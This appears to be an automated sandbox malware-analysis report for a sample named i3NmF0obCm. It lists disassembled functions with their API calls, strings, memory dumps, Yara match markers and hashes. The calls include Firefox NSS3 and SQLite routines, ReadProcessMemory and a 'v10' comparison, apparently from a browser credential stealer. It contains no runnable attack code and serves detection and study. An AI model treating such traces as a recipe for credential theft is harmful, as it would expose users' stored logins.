Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 720c8d7dc14f0907db08df6cdc5038f06fe6ac3b065bf0119433f2bbca01b05e
Instruction ID: 12fa48902883e0b3c3aabff4d11db6d05cfec80801df5754ec5af36f44720f83
Opcode Fuzzy Hash: 720c8d7dc14f0907db08df6cdc5038f06fe6ac3b065bf0119433f2bbca01b05e
Instruction Fuzzy Hash: 5101D6B290171D9FCB21AF25A80977E73A0BF04B24F291025FA197B281DF347941EBD2

Function 6C686840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000000,?,6C68AA9B,?,?,?,?,?,?,?,00000000,?,6C6880C1), ref: 6C686846

Part of subcall function 6C5E1770: calloc.MOZGLUE(00000001,0000019C,?,6C5E15C2,?,?,?,?,?,00000001,00000040), ref: 6C5E178D

PR_NewMonitor.NSS3(00000000,?,6C68AA9B,?,?,?,?,?,?,?,00000000,?,6C6880C1), ref: 6C686855

Part of subcall function 6C648680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C5F55D0,00000000,00000000), ref: 6C64868B
Part of subcall function 6C648680: PR_NewLock.NSS3(00000000,00000000), ref: 6C6486A0
Part of subcall function 6C648680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C6486B2
Part of subcall function 6C648680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C6486C8
Part of subcall function 6C648680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C6486E2
Part of subcall function 6C648680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C6486EC
Part of subcall function 6C648680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C648700

PR_NewMonitor.NSS3(?,6C68AA9B,?,?,?,?,?,?,?,00000000,?,6C6880C1), ref: 6C68687D

Part of subcall function 6C5E1770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C5E18DE
Part of subcall function 6C5E1770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C5E18F1

PR_NewMonitor.NSS3(?,6C68AA9B,?,?,?,?,?,?,?,00000000,?,6C6880C1), ref: 6C68688C

Part of subcall function 6C5E1770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C5E18FC
Part of subcall function 6C5E1770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C5E198A

PR_NewLock.NSS3 ref: 6C6868A5

Part of subcall function 6C6B98D0: calloc.MOZGLUE(00000001,00000084,6C5E0936,00000001,?,6C5E102C), ref: 6C6B98E5

PR_NewLock.NSS3 ref: 6C6868B4

Part of subcall function 6C6B98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C6B9946
Part of subcall function 6C6B98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5716B7,00000000), ref: 6C6B994E
Part of subcall function 6C6B98D0: free.MOZGLUE(00000000), ref: 6C6B995E

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
String ID:
API String ID: 200661885-0
Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction ID: 98d01f19cf0c3566413dbb64841257c066855eb4520db94178bf176e3b7a90da
Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction Fuzzy Hash: B501FBB1A12B0786E7916B764C103EB76E45F4678DF50093E856EC6B40EF71D4088BB9

Function 6C5DAE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5DAFDA

Strings

unable to delete/modify collation sequence due to active statements, xrefs: 6C5DAF5C
%s at line %d of [%.10s], xrefs: 6C5DAFD3
misuse, xrefs: 6C5DAFCE
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5DAFC4

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 722dfdd81b02f2037d9ebf794524d4b462f7be6a98654b864e46b84d08d299d9
Instruction ID: bdb166ca058af3dd6cf6473c1e73c000738c241e1c00b4d2e3dbb850652aa207
Opcode Fuzzy Hash: 722dfdd81b02f2037d9ebf794524d4b462f7be6a98654b864e46b84d08d299d9
Instruction Fuzzy Hash: A791F2B5A013168FDB04CF6DCC90AAAB7F2BF45314F1A45A8E864AB751D334BD01CB65

Function 00EF4E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00EF4E4F
??_U@YAPAXI@Z.MSVCRT ref: 00EF4E7D

Part of subcall function 00EF4B00: strlen.MSVCRT ref: 00EF4B11
Part of subcall function 00EF4B00: strlen.MSVCRT ref: 00EF4B35

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00EF4EC2
??_V@YAXPAX@Z.MSVCRT ref: 00EF4FE3

Part of subcall function 00EF4D10: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00EF4D28

Strings

@, xrefs: 00EF4ED6

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: 1b72e456b862c0cfa244f7a8e4394c0d7f961d8e34e0a6f2961e6a1c30e15c69
Instruction ID: 9fd79842475cdfe481a8eb8b3284abb9ca3df09201790a8967edcd3bc1084531
Opcode Fuzzy Hash: 1b72e456b862c0cfa244f7a8e4394c0d7f961d8e34e0a6f2961e6a1c30e15c69
Instruction Fuzzy Hash: 5C51F8B2E0410DAFDB04CF98D991AFFB7B5BF88304F149519FA19A7244D734AA11CBA1

Function 6C57E4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C57E53A
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C57E5BC

Strings

database corruption, xrefs: 6C57E52F, 6C57E5B1
%s at line %d of [%.10s], xrefs: 6C57E534, 6C57E5B6
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C57E525, 6C57E596, 6C57E5A7

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 3237ee204691994e03762ea48f16e81e0294a07ba2168e4d9201aea3707c1740
Instruction ID: e5cb3e5732c5fc96f41d51e4fa6ca71571073f561cf2eeb8117136dd341665fc
Opcode Fuzzy Hash: 3237ee204691994e03762ea48f16e81e0294a07ba2168e4d9201aea3707c1740
Instruction Fuzzy Hash: DA313A306407299FC321CEADCC919AEB7A4EB45714B540D7DE448A7B82F3A5E985C3E0

Function 6C666DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C666E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C666E57

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C666E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C666EAA

Strings

npl, xrefs: 6C666DF9

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: npl
API String ID: 3163584228-3390371981
Opcode ID: fe8d9389a40dc3cbd6564f5c9f507769aedc7a3dd3e0342c8b2a7e6c9e282a44
Instruction ID: 77ce1baa1ff5eac24febabd162b433394f2b2dd336aaf4d35522f0c276893b3c
Opcode Fuzzy Hash: fe8d9389a40dc3cbd6564f5c9f507769aedc7a3dd3e0342c8b2a7e6c9e282a44
Instruction Fuzzy Hash: 2431C171618612EEDB141F36ED04396B7A4AB0231EF14063DD4AAD6E80EB31E455CB8B

Function 6C5F6420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C5F5DEF,?,?,?), ref: 6C5F6456
CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C5F5DEF,?,?,?), ref: 6C5F6476
CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C5F5DEF,?,?,?), ref: 6C5F64A0
PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C5F5DEF,?,?,?), ref: 6C5F64C2

Strings

]_l, xrefs: 6C5F6489

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CertificateError$DestroyTemp
String ID: ]_l
API String ID: 3886907618-907858045
Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction ID: d23fe795807bacb2c4817dc54e0346a1d4e7c6787d901ff040d6b464272024c2
Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction Fuzzy Hash: 2421EE719003016FEB14AE18DC49B6376E8AB40318F144938F569C6B41EBB2D955CB51

Function 6C6CA800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C597915,?,?), ref: 6C6CA86D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C597915,?,?), ref: 6C6CA8A6

Strings

database corruption, xrefs: 6C6CA89B
%s at line %d of [%.10s], xrefs: 6C6CA8A0
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6CA891

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 9635c86d45fb7e0222c7fbd29aa18a27c26e4dd3fa01f40e190909770bf93b54
Instruction ID: b3dff4b391083972d51ea0df7b4e1456c2cea97c52ee1432b1231b33899d29c4
Opcode Fuzzy Hash: 9635c86d45fb7e0222c7fbd29aa18a27c26e4dd3fa01f40e190909770bf93b54
Instruction Fuzzy Hash: 73113371B00214ABDB048F21DC90AAAB7A5FF88314F008039FC094BB81EB34A916CB96

Function 6C5E0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C5E0BDE), ref: 6C5E0DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C5E0BDE), ref: 6C5E0DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C5E0BDE), ref: 6C5E0DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C5E0BDE), ref: 6C5E0E32

Strings

%s incr => %d (find lib), xrefs: 6C5E0E2D

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 938e109fde1d218fd7ecb94df4e9378782b4562cd336ea5297be0eaa90772814
Instruction ID: d54370de463e5dab6f3bd79d0e59c41f21c45ddc0c63131012a32184da037419
Opcode Fuzzy Hash: 938e109fde1d218fd7ecb94df4e9378782b4562cd336ea5297be0eaa90772814
Instruction Fuzzy Hash: B80128727003149FE6109F248C49E1773ECDB89609B05483ED949D7641EB61EC1487E1

Function 6C69AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]hl,00000000,?,?,6C676AC6,?), ref: 6C69AC2D

Part of subcall function 6C63ADC0: TlsGetValue.KERNEL32(?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AE10
Part of subcall function 6C63ADC0: EnterCriticalSection.KERNEL32(?,?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AE24
Part of subcall function 6C63ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C61D079,00000000,00000001), ref: 6C63AE5A
Part of subcall function 6C63ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AE6F
Part of subcall function 6C63ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AE7F
Part of subcall function 6C63ADC0: TlsGetValue.KERNEL32(?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AEB1
Part of subcall function 6C63ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AEC9

PK11_FreeSymKey.NSS3(?,@]hl,00000000,?,?,6C676AC6,?), ref: 6C69AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]hl,00000000,?,?,6C676AC6,?), ref: 6C69AC59
free.MOZGLUE(8CB6FF01,6C676AC6,?,?,?,?,?,?,?,?,?,?,6C685D40,00000000,?,6C68AAD4), ref: 6C69AC62

Strings

@]hl, xrefs: 6C69AC05

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]hl
API String ID: 1595327144-924120606
Opcode ID: 10eb31febb2cb6b61b2d73fb6b77851fc816078178e62696b64fe38a07a6500d
Instruction ID: c29149a5b21c305a014d87ed53d78ca993d1385f86ddf8f83501c08e6f8ab426
Opcode Fuzzy Hash: 10eb31febb2cb6b61b2d73fb6b77851fc816078178e62696b64fe38a07a6500d
Instruction Fuzzy Hash: E20178B5A00201DBDB00DF14E8C0B5677E8AB05B19F1880A8E9498F706D730E848CBAA

Function 00EF00D0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00EF00F8
strtok_s.MSVCRT ref: 00EF023D

Part of subcall function 00EF8640: lstrlen.KERNEL32(00000000,?,?,00EF3D93,00EFE4BB,00EFE4BA,?,?,00EF4A46,00000000,?,013214B8,?,00EFE988,?,00000000), ref: 00EF864B
Part of subcall function 00EF8640: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF86A5

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 12346f829f0a92179349c0f111c39170d0080c7909dff2033f725b68bd6a2513
Instruction ID: 5c39d91d2c1ba8da4300ac42456786cb0db0f601902360de2aa29c1614ae9372
Opcode Fuzzy Hash: 12346f829f0a92179349c0f111c39170d0080c7909dff2033f725b68bd6a2513
Instruction Fuzzy Hash: 59513F74A4420DDFCB08DF54D595ABE77B5FF44308F209059E902AB352D730EA95CBA1

Function 00EE9800 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00EE981B
memset.MSVCRT ref: 00EE984E
LocalAlloc.KERNEL32(00000040,?), ref: 00EE989E

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF8640: lstrlen.KERNEL32(00000000,?,?,00EF3D93,00EFE4BB,00EFE4BA,?,?,00EF4A46,00000000,?,013214B8,?,00EFE988,?,00000000), ref: 00EF864B
Part of subcall function 00EF8640: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF86A5

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

Strings

v10, xrefs: 00EE9812
@, xrefs: 00EE9857

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: @$v10
API String ID: 1400469952-24753345
Opcode ID: af1b65326b08f3948a15b6483ee30d6752e84cc53ff0b44094b222d9e507d9af
Instruction ID: 6fec5f121498047116b712a44c566a0b500b4e84a282c8c46f35943b84b9a27f
Opcode Fuzzy Hash: af1b65326b08f3948a15b6483ee30d6752e84cc53ff0b44094b222d9e507d9af
Instruction Fuzzy Hash: 9F411871A0020CEFDB08DFA9D995BEE77B5BF44704F009118F609BB295DB70AA45CB90

Function 6C682460 Relevance: 7.6, APIs: 5, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,6C727379,00000002,?), ref: 6C682493
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C6824B4
PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6C727379,00000002,?), ref: 6C6824EA
PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6C727379,00000002,?), ref: 6C6824F5
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6C727379,00000002,?), ref: 6C6824FE

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Error$Alloc_FreeK11_Utilfree
String ID:
API String ID: 2595244113-0
